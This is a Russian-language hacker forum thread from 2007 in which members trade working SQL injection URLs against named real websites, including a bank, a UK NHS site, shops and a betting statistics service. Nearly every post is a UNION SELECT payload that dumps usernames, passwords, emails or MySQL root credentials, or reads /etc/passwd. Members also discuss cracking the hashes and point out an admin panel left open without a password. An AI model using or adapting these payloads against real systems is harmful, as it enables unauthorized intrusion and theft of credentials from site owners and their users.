SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    #1601 n1†R0x, 3 Apr 2007
    Last edited: 3 Apr 2007
    1 person likes this.
  2. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.rivierenland.nl/index.php?pag=shop.php?id=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(login,0x71),0x71)+from+users/*
    
    Code:
    http://www.regiosat.com/index.php?page=shop.php?id=-128+union+select+1,2,login,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
    Code:
    http://lix.nl/index.php?page=shop.php?id=-945+union+select+1,2,login,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
    таблицу с пассами не подобрал, мб ее там вобще нету=\
     
    1 person likes this.
  3. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.optimistmag.org/ru/0017/one.php?id=-723+union+select+1,2,3,4,5,6,7,8,concat(user(),char(58),database(),char(58),version()),10,11,12,13,14,15,16,17,18,19,20/*
    Code:
    http://gaia.arctic.org.ru/news/news.php?id=-88+union+select+1,2,concat(user(),char(58),database(),char(58),version()),4,5,6,7/*
     
    2 people like this.
  4. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    progmusic.ru
    Code:
    http://progmusic.ru/rus/modules.php?name=Sections&op=viewarticle&artid=-1+union+select+1,2,username,user_password,5,6,7,8+from+phpbb_users+limit+4,1/*
    concat() не рулит, антихек =\

    еще есть форма на сайте, база вроде другая.. кому интересно - копните ;)


    и еще
    voyage-luxe.ru
    Code:
    http://www.voyage-luxe.ru/chapter60.html?uid=-1+union+select+1,convert(concat(user,0x3a,password)+using+cp1251),3,null,5+from+mysql.user/*
    мб и было, пофиг..
     
    3 people like this.
  5. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.maak.ru - не путаем с наркоманским сайтом!
    Code:
    http://www.maak.ru/news.php3?id=-67+UNION+SELECT+1,concat(user(),0x3a,version()),3,4,5/*
    http://www.maak.ru/admin/ - вход без пароля!
     
    1 person likes this.
  6. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    http://www.bext.ru

    Банк Тулы!


    Code:
    http://www.bext.ru/news.php3?id=-85+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
     
    1 person likes this.
  7. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    titoff.ru
     
    2 people like this.
  8. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.picnroll.com/us/detail.php?id=-35+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15+from+admin/*
    Code:
    http://haytom.us/showarticle.php?id=19+union+select+1,version(),3,4,5/*
    Code:
    http://www.onami.us/events/event.php?id=-14+union+select+1,2,concat(version(),0x3a,database()),4,5,6/*
     
    3 people like this.
  9. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://www.kzt.oswiata.org.pl/news.php3?id=-37+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8/*
     
    2 people like this.
  10. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    dancers.org

    http://www.dancers.org/news.php3?id=-5'+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5/*

    Быстро заскочил домой на обед, в процесе приёма пищи решил поискать скули. Таблицы не перебирал но походу там есть чё стоещее =)
     
  11. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://www.clabbergirl.com/store/store.php?mode=cat&cat_id=-3%20union%20select%201,user_Username,3,user_password,5%20from%20users/*
    Шоп какой-то. Пароли открыты
    __:)__

    И кстати, если вы задолбались убирать пробелы из скулей, просто нажмите на кнопку "цитировать".
     
    #1611 kamaz, 4 Apr 2007
    Last edited: 4 Apr 2007
    1 person likes this.
  12. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    больше похоже на md5 unix
     
    1 person likes this.
  13. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Согласен, похоже, но на сколько я знаю, md5 unix состоит из 31 символа
     
  14. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    ну да, видно тут какая-то своя криптовка пасса...
     
  15. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3
    http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
    137&sid=2007&stats=true&id=-1%20union%20select%
    20LOAD_FILE(concat(char(47,101,116,99,47,112,97,115,
    115,119,100))),2+limit+1/*

    Помогите ка раскачать
     
  16. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    /etc/passwd
    Code:
    http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*
    
    MySQL root (видимо без пасса)
    Code:
    http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*
    
     
    #1616 maxster, 4 Apr 2007
    Last edited: 4 Apr 2007
    3 people like this.
  17. Woldemar

    Woldemar Member

    Joined:
    9 Jun 2005
    Messages:
    33
    Likes Received:
    5
    Reputations:
    3

    Не понял etc/passwd а что дальше то. :confused: сорри
     
    2 people like this.
  18. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Еще один магазин. Таблица users, а выводит, по всей видимости, названия моделей =(

     
    1 person likes this.
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Одна из идеальных =)
    Code:
    http://www.immunisation.nhs.uk/article.php?id=9999999'+union+select+1,2,concat_ws(char(58),name,username,password),concat(version(),char(58),user()),5,6,7,8,9+from+user+limit+2,2/*
     
    3 people like this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
    Code:
    http://www.hnk.hr/hr/predstava.php?id=-18+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password),0x71),0x71),10,11,12,13,14,15+from+users/*
    Code:
    http://www.gamer.hr/najave/swat4_ssynd.php?id=-210%20UNION%20SELECT%201,concat(email,0x3a,password),3,4,5,6,7,8,9+from+user+limit+3,1/*
     
    2 people like this.
Thread Status:
Not open for further replies.